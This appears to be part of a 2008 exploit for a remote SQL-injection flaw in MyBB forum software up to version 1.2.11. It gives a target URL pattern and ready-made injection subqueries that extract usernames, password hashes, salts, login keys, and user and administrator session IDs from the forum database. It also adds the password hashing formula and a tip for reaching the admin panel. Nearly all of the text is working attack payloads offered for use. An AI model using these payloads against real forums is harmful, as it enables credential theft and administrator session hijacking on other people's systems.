* - <your login here>
** - <your uid here>
Example, http://www.target.com/mybb/member.php?action=profile&uid=23

Presets:
user pass hash: (select concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,loginkey) from mybb_users where uid=1)
user session: (select concat(uid,0x3A,sid,0x3a,ip,0x3a,time,0x3A,useragent) from mybb_sessions where uid=1 limit 1)
admin session: (select concat(uid,0x3A,sid,0x3a,ip,0x3a,dateline,0x3A,lastactive,0x3A,loginkey) from mybb_adminsessions limit 1)

[ i ] Password algoritm : md5(md5($salt).md5($password))
[ i ] CLIENT-IP use to enter the panel administrator ;)

© c0d3d by Elekt

MyBB <= 1.2.11 [disablesmilies] Remote SQL-injection Exploit © Antichat

Author: Janek Vind, [waraxe-2008-SA#064], 21. January 2008, Estonia, Tartu, http://www.waraxe.us/advisory-64.html